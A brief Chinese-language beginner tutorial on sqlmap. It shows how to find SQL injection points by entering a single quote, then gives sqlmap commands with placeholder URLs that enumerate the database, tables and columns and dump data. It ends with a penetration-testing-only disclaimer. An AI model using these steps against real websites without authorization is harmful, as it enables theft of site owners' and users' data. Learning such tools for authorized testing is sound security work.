对于sqlmap的初步应用

对于sqlmap的应用

简单的渗透

1. 找注入点

首先要找到交互点，就是像网站的输入框，搜索框之类的

之后进行验证，借助’这个符号进行验证。比如像下面这个图片中这样

如果页面报错或者空白说明这是一个有用的注入点，接下来进行渗透

使用cmd打开sqlmap，输入以下命令python sqlmap.py -u “网站地址“ –current-db 来获取数据库名称

找到名称为cms
进行下一步获取数据表名称
python sqlmap.py -u “网站地址“ -D 数据库名称 –tables

获取到数据表的名称，对其进行判断，找到你要访问的表，去获取数据列
python sqlmap.py -u “网站地址“ -D 数据库名称 -T数据表名称 –columns

得到数据列，然后去找数据
python sqlmap.py -u “网站地址“ -D 数据库名称 -T数据表名称 -C 数据列名称 –dump

本文中使用的网址仅作为渗透测试，不能用于其他用途！！！